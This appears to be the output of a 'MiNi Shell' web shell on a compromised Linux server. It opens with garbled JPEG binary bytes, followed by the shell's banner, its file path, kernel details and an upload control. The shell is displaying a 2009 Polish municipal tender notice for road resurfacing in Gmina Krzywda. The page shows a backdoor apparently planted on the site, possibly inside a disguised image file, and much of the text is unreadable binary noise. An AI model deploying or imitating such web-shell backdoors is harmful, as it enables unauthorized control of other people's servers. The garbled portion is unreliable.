JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090724/252978-N-2009.html

<p class="kh_header"><b>Krzywda: Modernizacja nawierzchni utwardzonych ulic i dróg gminnych na terenie Gminy Krzywda-2009 cześć 2</b><br>
<b>Numer ogłoszenia: 252978 - 2009; data zamieszczenia: 24.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krzywda , ul. Żelechowska 24B, 21-470 Krzywda, woj. lubelskie, tel. 025 7551006, faks 025 7551061.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krzywda.netbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja nawierzchni utwardzonych ulic i dróg gminnych na terenie Gminy Krzywda-2009 cześć 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Modernizacja nawierzchni utwardzonych ulic i dróg gminnych na terenie Gminy Krzywda-2009 cześć 2  w tym: Okrzeja - Rowiny  (na długości 550 m począwszy od skrzyżowania przy drodze Kol. Dąbrowa I) Zakres: - mechaniczne oczyszczenie nawierzchni drogi -Uzupełnienie istniejącej podbudowy tłuczniem lub masą bitumiczną - destruktem (ubytki w podbudowie, wyrównanie), -skropienie oczyszczonej nawierzchni drogi emulsją, -wykonanie nawierzchni ulepszonych z mieszanki mineralno-bitumicznej średniej grubości 5 cm po zagęszczeniu na szerokości 4,8 m i długości 550m; Okrzeja - Kol. Gąszcze  (od skrzyżowania z drogą w kierunku Wojciechówki do skrzyżowania z drogą w kierunku Grabowa) zakres- mechaniczne oczyszczenie nawierzchni drogi, -Uzupełnienie istniejącej podbudowy tłuczniem lub masą bitumiczną - destruktem(ubytki w podbudowie, wyrównanie), -skropienie oczyszczonej nawierzchni drogi emulsją, -wykonanie nawierzchni ulepszonych z mieszanki mineralno-bitumicznej średniej grubości 5 cm po zagęszczeniu, na szerokości 4,2 m na całej długości drogi; Wola Okrzejska - Kol. Kobylczyku ( przedłużenie istniejącej nawierzchni bitumicznej koło stacji PKP na długości 740 m w kierunku drogi do Lipin) Zakres: -mechaniczne oczyszczenie nawierzchni drogi-Uzupełnienie istniejącej podbudowy tłuczniem lub masą bitumiczną - destruktem(ubytki w podbudowie, wyrównanie), -skropienie oczyszczonej nawierzchni drogi emulsją, -wykonanie nawierzchni ulepszonych z mieszanki mineralno-bitumicznej średniej grubości 5 cm po zagęszczeniu, na szerokości 4,8 m na całej długości drogi; Cisownik - Budki (od skrzyżowania pomiędzy Cisownikiem a Wierzcholiną do istniejącej nawierzchni bitumicznej w Budkach) Zakres: - mechaniczne oczyszczenie nawierzchni drogi, -Uzupełnienie istniejącej podbudowy tłuczniem lub masą bitumiczną - destruktem (ubytki w podbudowie, wyrównanie), -skropienie oczyszczonej nawierzchni drogi emulsją, -wykonanie nawierzchni ulepszonych z mieszanki mineralno-bitumicznej średniej grubości 5 cm po zagęszczeniu na szerokości 4,8 m i długości 1068m; Feliksin (Odcinek 370 m w kierunku wsi Sokola) zakres: - Uzupełnienie istniejącej podbudowy tłuczniem  lub masą bitumiczną - destruktem (ubytków w podbudowie, wyrównanie krawędzi równolegle do granicy drogi i poszerzenie do 5,0m), -mechaniczne oczyszczenie nawierzchni drogi, -skropienie oczyszczonej nawierzchni drogi emulsją, -wykonanie nawierzchni ulepszonych z mieszanki mineralno-bitumicznej średniej grubości 6 cm po zagęszczeniu na szerokości 4,8 m na długości 370 m.; Kożuchówka ( przedłużenie istniejącej nawierzchni bitumicznej na długości 452 m w kierunku Kol. Kosiorki) zakres: -mechaniczne oczyszczenie nawierzchni drogi-Uzupełnienie istniejącej podbudowy tłuczniem lub masą bitumiczną - destruktem (ubytki w podbudowie, wyrównanie), -skropienie oczyszczonej nawierzchni drogi emulsją, -wykonanie nawierzchni ulepszonych z mieszanki mineralno-bitumicznej średniej grubości 5 cm po zagęszczeniu, na szerokości 4,5 m na długości 452 m.
Roboty objęte niniejszą specyfikacją są to roboty oznaczone kodem, zgodnie z rozporządzeniem nr 2195/2002 z dn. 5 listopada 2002 r. w sprawie Wspólnego Słownika Zamówień[CPV], (Dz. Urz. WE L 340z 16.12.2002 r. z późniejszymi zmianami) Kod CPV: 45233220-7 Roboty w zakresie nawierzchni dróg Szczegółowy zakres robót zawiera dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót oraz przedmiary robót stanowiące załączniki do siwz. Wykonawcy przed złożeniem oferty winni dokonać weryfikacji zgodności przedmiarów robót z dokumentacją projektową i ze stanem faktycznym poprzez szczegółową analizę ww. dokumentów oraz wizję w terenie.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca pod rygorem nieważności oferty wnosi wadium w wysokości 12 000,00 zł. (słownie złotych: dwanaście tysięcy 00/100) najpóźniej do dnia 17-08-2009 r. do godz. 11:00 i dołącza oryginał lub poświadczoną kopię potwierdzenia wniesienia wadium do oferty; Wadium może być wnoszone w jednej z form określonych w art. 45, ust. 6 upzp. Wykonawca sam wybiera sobie formę wadium; W przypadku wyboru pieniężnej formy, wadium należy wpłacać na konto Urzędu Gminy Nr BS Krzywda 81-9203-0002-0000-1238-2000-0010 (za termin wniesienia wadium uznaje się datę wpływu na rachunek zamawiającego). W przypadku wnoszenia wadium w formie niepieniężnej dokumenty związane z wadium należy złożyć w oryginale w Wydziale Finansowym Urzędu Gminy w, pok. Nr 6. Wymagana ważność tej formy wadium - nie krótsza jak okres związania ofertą. Zamawiający zwróci lub zatrzyma wadium, zgodnie z art. 46 upzp. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 1) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków: 1. Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień; 2. Prowadzą działalność gospodarczą na zasadach określonych w przepisach ustawy z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (tj. Dz. U. z 2007r. Nr 127, poz. 880) lub kodeksu spółek handlowych; 3. Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; 4. Udokumentują, że w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania (ukazania się ogłoszenia o niniejszym przetargu w Biuletynie Zamówień Publicznych), a jeżeli okres działalności jest krótszy - w tym okresie wykonali co najmniej jedno zamówienie o zakresie i charakterze porównywalnym z niniejszym zamówieniem. Za roboty porównywalne z przedmiotowym zamówieniem uznane zostaną roboty polegające na budowie, rozbudowie lub modernizacji co najmniej jednego przedsięwzięcia: drogi publicznej, o wartości min. 1 000.000,00 zł.; 5. Dysponują osobami posiadającymi uprawnienia niezbędne do wykonania przedmiotu zamówienia tj. pełnienia funkcji kierownika budowy w następujących specjalnościach: - w zakresie budowy dróg 6. Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 7. Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej do kwoty nie mniejszej niż 1 000 000 zł; 8. Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia, na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy: - nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4; - podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych; - wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji; - złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania; - nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych; - nie zgodzili się na przedłużenie okresu związania ofertą. Zamawiający odrzuca ofertę jeżeli: 1) jest niezgodną z ustawą; 2) jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia; 3) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji; 4) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia; 5) została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia; 6) zawiera omyłki rachunkowe w obliczeniu ceny, których nie można poprawić na podstawie art. 88 Prawa zamówień publicznych, lub błędy w obliczeniu ceny; 7) wykonawca w terminie 7 dni od dnia otrzymania zawiadomienia nie zgodził się na poprawienie omyłki rachunkowej w obliczeniu ceny; 8) jest nieważna na podstawie odrębnych przepisów. Opis sposobu dokonywania oceny spełniania tych warunków Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania. Uwaga: Zamawiający wykluczy z postępowania Wykonawcę, który nie spełnia wymaganych warunków oraz jeżeli stwierdzi, że dostarczone przez niego informacje istotne dla prowadzonego postępowania są nieprawdziwe. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą -art. 24 ust.4 upzp. Zamawiający odrzuca ofertę, jeżeli wystąpi przynajmniej jedna z przesłanka unormowana w art. 89 ust. 1 ustawy Prawo zamówień publicznych. Z postępowania o udzielenie zamówienia wyklucza się wykonawców określonych w art. 24 ust. 2 upzp Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do uzupełnienia tych dokumentów w określonym terminie ( art. 26 ust. 3 upzp) Postępowania prowadzi się w języku polskim. Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych (przez wykonawcy, podmioty występujące wspólnie) dokumentów wymienionych w specyfikacji istotnych warunków zamówienia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie wynikające z art. art. 22 ust 1 Pzp, którego wzór stanowi załącznik nr 1 do oferty. 2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 3. Pełnomocnictwo do występowania w imieniu wykonawcy, wystawione po dniu ogłoszenia niniejszego przetargu i podpisane wraz z datą przez osoby uprawnione lub inne dokumenty potwierdzające posiadanie uprawnień-pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych. 4. Wykaz osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności na Załączniku nr 4 do oferty potwierdzony niezbędnymi w realizacji niniejszego zamówienia uprawnieniami do sprawowania samodzielnych funkcji technicznych w budownictwie (w tym przede wszystkim uprawnienia o specjalnościach: w zakresie budowy dróg) oraz aktualne zaświadczenia o przynależności tych osób do Polskiej Izby Inżynierów Budownictwa (druk do wypełnienia w załączeniu do SIWZ -załącznik nr 4 do oferty). 5. Wykaz wykonanych (tj. rozpoczętych i zakończonych) w ciągu ostatnich pięciu lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. referencje od poprzednich Zamawiających lub protokół odbioru końcowego wykonanych robót) Dla uznania ważności oferty należy wykazać wykonanie min. 1 roboty o łącznej wartości nie mniejszej niż 1 000 000 zł i zakresie budowy, rozbudowy, lub modernizacji - drogi publicznej (druk do wypełnienia w załączeniu do SIWZ- załącznik Nr 5 do oferty). 6. Wykaz podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia oraz zakresu wykonywanych przez nich czynności, rodzaju i wartości powierzonej im części zamówienia (wykaz-druk do wypełnienia w załączeniu do SIWZ -załącznik nr 6 do oferty + kopie uprawnień osób wymienionych w wykazie, potwierdzające, że posiadają one kwalifikacje niezbędne do wykonania zamówienia). 7. Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności do kwoty nie mniejszej niż 1 000 000zł. 8. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 9. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert; a w przypadku podmiotów zbiorowych aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 10. W przypadku podmiotów zbiorowych aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 11. Dowód wniesienia wadium. 12. Harmonogram rzeczowo- finansowy. 13. Kosztorys ofertowy (na podstawie dołączonej do SIWZ dokumentacji i przedmiarów robót). Przedmiar robót należy traktować jedynie pomocniczo - wyliczone w ofercie ceny są ryczałtowymi cenami jednostkowymi i nie będą zmieniane bez względu na ewentualne różnice pomiędzy przedmiarem, dokumentacją a robotami wykonanymi w rzeczywistości. Sporządzony kosztorys winien zawierać co najmniej wypełnione kolumny takie jak: Lp, opis pozycji, ilość, cena jednostkowa, wartość wycenianej pozycji, należy również podsumować wszystkie pozycje kosztorysu z podaniem wartości ogółem poszczególnych elementów robót, oraz podać globalną wartość Brutto. 14. Inne dokumenty - wg potrzeb.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> https://krzywda.netbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> jak wyżej dla strony internetowej-bezpłatnie, w formie papierowej (wydruk) za pobraniem - 40 zł...</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2009 godzina 11:00, miejsce: Urząd Gminy Krzywda, ul. Żelechowska 24 B, 21-470 Krzywda - pokój Nr 3 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com